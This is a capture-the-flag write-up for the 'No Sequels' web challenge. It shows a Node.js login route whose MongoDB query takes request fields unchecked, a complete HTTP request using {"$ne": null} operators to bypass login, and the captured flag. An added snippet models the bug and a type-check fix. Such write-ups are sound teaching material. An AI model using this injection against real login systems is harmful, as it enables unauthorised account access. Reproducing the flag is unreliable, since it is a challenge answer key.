Tags: nosql-injection web
Rating:
# ▼▼▼No Sequels (Web: 50pts, solved: 312/1374 = 22.7%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
The prequels sucked, and the sequels aren't much better, but at least we always have the original trilogy.
Author: SirIan
Hint: MongoDB is a safer alternative to SQL, right?
```
---
## 【source code】
```
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));
...
router.post('/login', verifyJwt, function (req, res) {
    // monk instance
    var db = req.db;
    var user = req.body.username;
    var pass = req.body.password;
    if (!user || !pass){
        res.send("One or more fields were not provided.");
    }
    var query = {
        username: user,
        password: pass
    }
    db.collection('users').findOne(query, function (err, user) {
        if (!user){
            res.send("Wrong username or password");
            return
        }
        res.cookie('token', jwt.sign({name: user.username, authenticated: true}, secret));
        res.redirect("/site");
    });
});
```
---
## 【understanding functions】
・Login function exists
---
## 【exploit】
From the title, I think this is NoSQL injection.
Because the app registers `bodyParser.json()`, the **/login** handler also accepts a JSON body, and `username` and `password` are passed to `findOne` unchanged. A JSON object such as `{"$ne": null}` is therefore interpreted as a MongoDB query operator rather than a string, so send the following **request converted to JSON format**:
```
POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 67
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE
{
"username": {"$ne": null},
"password": {"$ne": null}
}
```
↓
`actf{no_sql_doesn't_mean_no_vuln}`
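As an added illustration (not part of the original writeup or the challenge code), the following Node.js snippet models how the JSON body above reaches the MongoDB query and shows the type check that stops it; the in-memory user list and the `findOne` stand-in are constructed assumptions, not a real database.

```javascript
// Added example (not the challenge's or the writeup's code): models how the
// JSON body reaches the MongoDB query, why {"$ne": null} matches every user,
// and the type check that closes the hole. No database is needed: a small
// in-memory matcher stands in for findOne(), and the users are constructed.

const users = [
  { username: "admin", password: "hunter2" },
  { username: "sirian", password: "correct-horse" },
];

// Stand-in for MongoDB matching: equality for plain values, $ne for operator
// objects. Real MongoDB supports many more operators; this covers the page's case.
function matches(doc, query) {
  return Object.keys(query).every((field) => {
    const cond = query[field];
    if (cond !== null && typeof cond === "object" && "$ne" in cond) {
      return doc[field] !== cond.$ne;
    }
    return doc[field] === cond;
  });
}

function findOne(query) {
  return users.find((u) => matches(u, query)) || null;
}

// Vulnerable: body fields go straight into the query, as in the challenge source.
// An object value such as {"$ne": null} becomes an operator, not a literal string.
function loginVulnerable(body) {
  return findOne({ username: body.username, password: body.password });
}

// Hardened: accept only strings, so operator objects are rejected before the
// query is built. Coercing with String() or a sanitizer that strips "$"-keys
// are alternatives (assumption: the app has no other input validation).
function loginHardened(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return null; // treated as a failed login
  }
  return findOne({ username: body.username, password: body.password });
}

// The page's payload, as bodyParser.json() would parse it.
const payload = { username: { $ne: null }, password: { $ne: null } };

console.log(loginVulnerable(payload)); // first user: the login is bypassed
console.log(loginHardened(payload));   // null: rejected
```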